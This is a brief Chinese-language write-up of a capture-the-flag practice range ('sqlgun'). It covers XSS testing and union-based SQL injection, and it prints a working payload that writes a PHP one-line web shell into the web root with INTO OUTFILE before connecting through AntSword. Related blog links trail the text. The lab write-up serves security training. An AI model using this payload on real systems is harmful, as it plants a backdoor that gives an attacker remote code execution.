sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
mingzhi619 小时前
绿盟二面面试题
android·web安全·渗透测试
暴躁的小胡!!!10 小时前
2025年最新总结安全基础(面试题)
网络·安全·web安全
FreeBuf_10 小时前
美国国土安全部终止资助,CVE漏洞数据库项目面临停摆危机
数据库·安全·web安全
zl0_00_012 小时前
rce漏洞学习
学习·安全·web安全
ALe要立志成为web糕手13 小时前
数据库脱裤
数据库·windows·mysql·web安全·网络安全·adb·mssql
暴躁的小胡!!!14 小时前
2025年最新Web安全(面试题)
网络·安全·web安全
Fanche40421 小时前
SQL 语句基础(增删改查)
运维·数据库·sql·mysql·web安全·oracle
it技术分享just_free1 天前
软考教材重点内容 信息安全工程师 第22章 网站安全需求分析与安全保护工程
web安全·网络安全·信息安全·系统安全·软考
ICT系统集成阿祥1 天前
100 个网络安全基础知识
安全·web安全
Lovely_181 天前
DDoS(分布式拒绝服务)攻击
web安全